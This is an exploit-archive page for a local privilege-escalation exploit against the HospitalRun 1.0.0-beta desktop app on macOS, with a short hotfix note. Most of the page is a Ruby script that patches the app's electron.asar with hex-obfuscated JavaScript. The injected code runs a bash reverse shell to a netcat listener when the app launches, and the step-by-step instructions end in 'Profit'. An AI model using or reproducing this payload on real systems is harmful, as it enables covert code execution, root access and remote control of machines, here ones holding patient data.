HospitalRun 1.0.0-beta macOS Local Root

HospitalRun 1.0.0-beta macOS Local Root: Posted Apr 6, 2023; Authored by Jean Pereira; HospitalRun version 1.0.0-beta local root exploit for macOS.; tags | exploit, local, root; SHA-256 | 5974878a49f1ebd87d13c459e69f6e25119f1ca212ec3fb8f6659b619d908c93; Download | Favorite | View

HospitalRun 1.0.0-beta macOS Local Root

# Exploit Title: HospitalRun  1.0.0-beta - Local Root Exploit for macOS
# Written by Jean Pereira <info@cytres.com>

# Date: 2023/03/04
# Vendor Homepage: https://hospitalrun.io
# Software Link: https://github.com/HospitalRun/hospitalrun-frontend/releases/download/1.0.0-beta/HospitalRun.dmg
# Version: 1.0.0-beta
# Tested on: macOS Ventura 13.2.1 (22D68)

# Impact: Command Execution, Privilege Escalation

# Instructions:
# Run local TCP listener with (e.g. nc -l 2222)
# Run exploit
# Wait for HospitalRun to be executed
# Profit (privileged rights e.g. root are gained)

# Hotfix: Remove write permissions from electron.asar to patch this vulnerability

# Exploit:

buffer =  "\x63\x6F\x6E\x73\x74\x20\x72\x65\x6E" +
          "\x64\x65\x72\x50\x72\x6F\x63\x65\x73" +
          "\x73\x50\x72\x65\x66\x65\x72\x65\x6E" +
          "\x63\x65\x73\x20\x3D\x20\x70\x72\x6F" +
          "\x63\x65\x73\x73\x2E\x61\x74\x6F\x6D" +
          "\x42\x69\x6E\x64\x69\x6E\x67\x28\x27" +
          "\x72\x65\x6E\x64\x65\x72\x5F\x70\x72" +
          "\x6F\x63\x65\x73\x73\x5F\x70\x72\x65" +
          "\x66\x65\x72\x65\x6E\x63\x65\x73\x27" +
          "\x29\x2E\x66\x6F\x72\x41\x6C\x6C\x57" +
          "\x65\x62\x43\x6F\x6E\x74\x65\x6E\x74" +
          "\x73\x28\x29"

payload = "\x72\x65\x71\x75\x69\x72\x65\x28\x22" +
          "\x63\x68\x69\x6C\x64\x5F\x70\x72\x6F" +
          "\x63\x65\x73\x73\x22\x29\x2E\x65\x78" +
          "\x65\x63\x53\x79\x6E\x63\x28\x22\x2F" +
          "\x62\x69\x6E\x2F\x62\x61\x73\x68\x20" +
          "\x2D\x63\x20\x27\x65\x78\x65\x63\x20" +
          "\x62\x61\x73\x68\x20\x2D\x69\x20\x3E" +
          "\x2F\x64\x65\x76\x2F\x74\x63\x70\x2F" +
          "\x30\x2E\x30\x2E\x30\x2E\x30\x2F\x32" +
          "\x32\x32\x32\x20\x30\x3E\x26\x31\x27" +
          "\x22\x29"

nopsled = "\x2F\x2A\x2A\x2A\x2A" +
          "\x2A\x2A\x2A\x2A\x2F"

File.open("/Applications/HospitalRun.app/Contents/Resources/electron.asar", "rb+") do |file|
  electron = file.read
  electron.gsub!(buffer, payload + nopsled)
  file.pos = 0
  file.write(electron)
end

Top Authors In Last 30 Days

Red Hat 225 files
indoushka 182 files
Ubuntu 97 files
Gentoo 32 files
Debian 19 files
Matthias Deeg 11 files
Chris Beiter 11 files
Frederik Beimgraben 11 files
Apple 10 files
malvuln 8 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,135)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,421)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,936)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,899)
UNIX (9,465)
UnixWare (188)
Windows (6,782)
Other

HospitalRun 1.0.0-beta macOS Local Root

HospitalRun 1.0.0-beta macOS Local Root

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HospitalRun 1.0.0-beta macOS Local Root

Share This

HospitalRun 1.0.0-beta macOS Local Root

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems